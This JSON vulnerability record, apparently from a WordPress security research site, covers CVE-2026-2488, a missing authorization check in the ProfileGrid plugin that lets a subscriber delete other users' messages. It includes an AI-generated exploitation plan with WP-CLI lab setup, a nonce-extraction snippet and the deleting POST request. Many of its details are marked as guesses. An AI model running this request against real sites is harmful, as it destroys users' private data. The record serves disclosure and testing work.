[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fvGVWpl_H-vHgeOdZa346zhQurAG1rAvpmUu9m9Ww1jo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":9,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":39},"CVE-2026-2488","profilegrid-missing-authorization-to-authenticated-subscriber-arbitrary-message-deletion","ProfileGrid \u003C= 5.9.8.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Message Deletion","The ProfileGrid – User Profiles, Groups and Communities plugin for WordPress is vulnerable to unauthorized message deletion due to a missing capability check on the pg_delete_msg() function in all versions up to, and including, 5.9.8.1. This is due to the function not verifying that the requesting user has permission to delete the targeted message. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary messages belonging to any user by sending a direct request with a valid message ID (mid parameter).","profilegrid-user-profiles-groups-and-communities",null,"\u003C=5.9.8.1","5.9.8.2","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-06 11:44:27","2026-03-07 01:21:21",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4c611fa0-28ef-4425-8614-fb61e250e625?source=api-prod",1,[22,23,24,25,26,27,28],"admin\u002Fclass-profile-magic-access-options.php","admin\u002Fpartials\u002Fadd-group-tabview.php","includes\u002Fclass-profile-magic-html-generator.php","profile-magic.php","public\u002Fclass-profile-magic-public.php","public\u002Fjs\u002Fpg-messaging.js","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-2488 (ProfileGrid Arbitrary Message Deletion)\n\n## 1. Vulnerability Summary\nThe **ProfileGrid** plugin (up to and including version 5.9.8.1) contains a missing authorization vulnerability in the `pg_delete_msg()` function. While the function is registered as an authenticated AJAX action, it fails to perform a capability check or verify ownership of the message being deleted. This allows any authenticated user (e.g., a Subscriber) to delete arbitrary messages from any conversation across the site by providing a specific message ID (`mid`).\n\n## 2. 
Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `pg_delete_msg` (inferred from function name and JS logic)\n- **HTTP Method:** POST\n- **Parameters:**\n    - `action`: `pg_delete_msg`\n    - `mid`: The ID of the message to be deleted (integer).\n    - `_wpnonce` or `nonce`: A valid AJAX nonce.\n- **Authentication Level:** Authenticated (Subscriber+).\n- **Precondition:** The attacker must know or guess the `mid` of the target message.\n\n## 3. Code Flow\n1. **Entry Point:** An authenticated user sends a POST request to `admin-ajax.php` with the action `pg_delete_msg`.\n2. **Hook Registration:** The plugin registers the AJAX handler (likely in a class like `PM_Messaging` or `Profile_Magic_Public`) using `add_action('wp_ajax_pg_delete_msg', 'pg_delete_msg')`.\n3. **Execution:**\n    - The `pg_delete_msg()` function is invoked.\n    - It retrieves the `mid` parameter from `$_POST['mid']`.\n    - It likely performs a nonce check (e.g., `check_ajax_referer('ajax-nonce', 'nonce')`).\n    - **Vulnerability:** It proceeds to call a database deletion method (e.g., `$wpdb->delete(...)` on the messaging table) using the provided `mid` without verifying if the `current_user_id()` is either the sender or the recipient of that specific message.\n4. **Sink:** The message is removed from the database regardless of ownership.\n\n## 4. Nonce Acquisition Strategy\nThe plugin localizes the AJAX nonce in `public\u002Fclass-profile-magic-public.php`.\n\n### Identification\n- **JS Object:** `pm_ajax_object` (or `pg_msg_object` in messaging contexts).\n- **Nonce Key:** `nonce`.\n- **Localization Source:**\n```php\n\u002F\u002F From public\u002Fclass-profile-magic-public.php\nwp_localize_script(\n    $this->profile_magic,\n    'pm_ajax_object',\n    array(\n        'ajax_url'         => admin_url( 'admin-ajax.php' ),\n        'nonce'            => wp_create_nonce( 'ajax-nonce' ),\n    )\n);\n```\n\n### Strategy\n1. 
**Trigger Loading:** The messaging scripts and nonces are enqueued on the User Profile page or pages containing the ProfileGrid messaging shortcode.\n2. **Create Test Page:** Use WP-CLI to create a page with the ProfileGrid Messaging shortcode.\n   ```bash\n   wp post create --post_type=page --post_title=\"Messages\" --post_status=publish --post_content='[pm_messages]'\n   ```\n3. **Login & Navigate:** Log in as the Subscriber (Attacker) and navigate to the created page.\n4. **Extract:** Use `browser_eval` to grab the nonce:\n   ```javascript\n   window.pm_ajax_object?.nonce || window.pg_msg_object?.nonce\n   ```\n\n## 5. Exploitation Strategy\n### Step-by-Step Plan\n1. **Discovery:** Use WP-CLI to identify the messaging table and a target message ID belonging to another user.\n2. **Setup:** Log in as an attacker (Subscriber).\n3. **Nonce:** Obtain the `ajax-nonce` from the frontend using the strategy in Section 4.\n4. **Attack Request:**\n   ```http\n   POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n   Content-Type: application\u002Fx-www-form-urlencoded\n\n   action=pg_delete_msg&mid=[TARGET_MID]&nonce=[ACQUIRED_NONCE]\n   ```\n5. **Validation:** Check the database to confirm the message with `mid` is gone.\n\n## 6. Test Data Setup\n1. **Users:**\n   - `victim_user` (Subscriber)\n   - `attacker_user` (Subscriber)\n2. **Message Creation:**\n   - ProfileGrid uses a custom table for messages. Since the source doesn't show the schema, we must find it.\n   - Run `wp db tables | grep pg_` to find the messaging table (likely `wp_pg_messages`).\n   - Use `wp db query` to insert a dummy message between two non-attacker users.\n   ```bash\n   # Example insertion (table name and columns inferred)\n   wp db query \"INSERT INTO wp_pg_messages (sender_id, recipient_id, message) VALUES (2, 3, 'Private Victim Secret')\"\n   ```\n3. 
**Identify Target ID:**\n   ```bash\n   wp db query \"SELECT mid FROM wp_pg_messages WHERE message = 'Private Victim Secret'\"\n   ```\n\n## 7. Expected Results\n- **Response:** The server should return a success status (likely `1` or a JSON success message).\n- **Database State:** A query for the `mid` should return zero results.\n- **Frontend State:** The message should no longer appear in the \"Victim's\" inbox\u002Foutbox.\n\n## 8. Verification Steps\n1. **WP-CLI Database Check:**\n   ```bash\n   # Query the messaging table for the deleted ID\n   wp db query \"SELECT * FROM wp_pg_messages WHERE mid = [TARGET_MID]\"\n   ```\n   *Expected: Empty result.*\n2. **Log Inspection:** Check for any \"Unauthorized\" errors in `wp-content\u002Fdebug.log` (though none are expected as the check is missing).\n\n## 9. Alternative Approaches\n- **Parameter Name Guessing:** If `mid` fails, check `pg-messaging.js` or the plugin source for other ID parameters like `message_id` or `tid` (thread ID).\n- **Global Nonce:** If `ajax-nonce` is rejected, look for a more specific messaging nonce that might be localized within `pg_msg_object`.\n- **Direct Hook Execution:** If the AJAX action name `pg_delete_msg` is incorrect, grep the full plugin directory for `wp_ajax_` to find the exact registered action:\n  ```bash\n  grep -r \"wp_ajax_\" . | grep \"delete\"\n  ```","The ProfileGrid plugin for WordPress is vulnerable to unauthorized message deletion in versions up to and including 5.9.8.1. 
The pg_delete_msg() function lacks proper ownership or capability checks, allowing any authenticated user to delete private messages belonging to any other user by simply providing a valid message ID.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprofilegrid-user-profiles-groups-and-communities\u002F5.9.8.1\u002Fadmin\u002Fclass-profile-magic-access-options.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprofilegrid-user-profiles-groups-and-communities\u002F5.9.8.2\u002Fadmin\u002Fclass-profile-magic-access-options.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprofilegrid-user-profiles-groups-and-communities\u002F5.9.8.1\u002Fadmin\u002Fclass-profile-magic-access-options.php\t2026-02-11 04:48:30.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprofilegrid-user-profiles-groups-and-communities\u002F5.9.8.2\u002Fadmin\u002Fclass-profile-magic-access-options.php\t2026-02-18 10:48:28.000000000 +0000\n@@ -92,7 +92,7 @@\n \n                 $admin_note = get_post_meta( $id, 'pm_admin_note_content', true );\n \t\tif ( trim( $admin_note )!='' ) {\n-\t\t\t$note          = '\u003Cdiv class=\"pg-admin-note\">' . $admin_note . '\u003C\u002Fdiv>';\n+\t\t\t$note          = '\u003Cdiv class=\"pg-admin-note\">' . wp_kses_post( $admin_note ) . '\u003C\u002Fdiv>';\n \t\t\t$note_position = get_post_meta( $id, 'pm_admin_note_position', true );\n \t\t\tif ( $note_position=='top' ) {\n \t\t\t\t$content = $note . $content;\n... (truncated)","1. Login to the WordPress site as a Subscriber-level user.\n2. Navigate to any page where the ProfileGrid messaging interface is active (e.g., a User Profile) to obtain the localized AJAX nonce (e.g., from the `pg_msg_object.nonce` or `pm_ajax_object.nonce` JavaScript objects).\n3. 
Identify the target message ID (`mid`) of a message to be deleted (this can often be found by inspecting the DOM of one's own messages or via enumeration).\n4. Send an authenticated POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the following parameters: `action=pg_delete_msg`, `mid=[target_mid]`, and the acquired nonce.\n5. The server will process the deletion without verifying if the authenticated user is the sender or recipient of the message associated with the provided `mid`.","gemini-3-flash-preview","2026-04-18 05:38:34","2026-04-18 05:38:54",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","5.9.8.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprofilegrid-user-profiles-groups-and-communities\u002Ftags\u002F5.9.8.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprofilegrid-user-profiles-groups-and-communities.5.9.8.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprofilegrid-user-profiles-groups-and-communities\u002Ftags\u002F5.9.8.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprofilegrid-user-profiles-groups-and-communities.5.9.8.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprofilegrid-user-profiles-groups-and-communities\u002Ftags"]
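Review bot: the only visible hunk (admin/class-profile-magic-access-options.php, @@ -92,7 +92,7 @@) wraps $admin_note in wp_kses_post() before it is concatenated into the pg-admin-note div, which is output sanitization of admin note content and not the missing capability or ownership check on pg_delete_msg() that this record describes as the fix for CVE-2026-2488; because the diff is marked "(truncated)" right after this hunk, the message-deletion fix should be confirmed in the other changed files listed (notably public/class-profile-magic-public.php and public/js/pg-messaging.js) rather than inferred from this hunk. A minor style point in the same hunk: the get_post_meta line is indented with spaces while the surrounding if/note lines use tabs, so normalizing to the plugin's tab indentation would keep the block consistent.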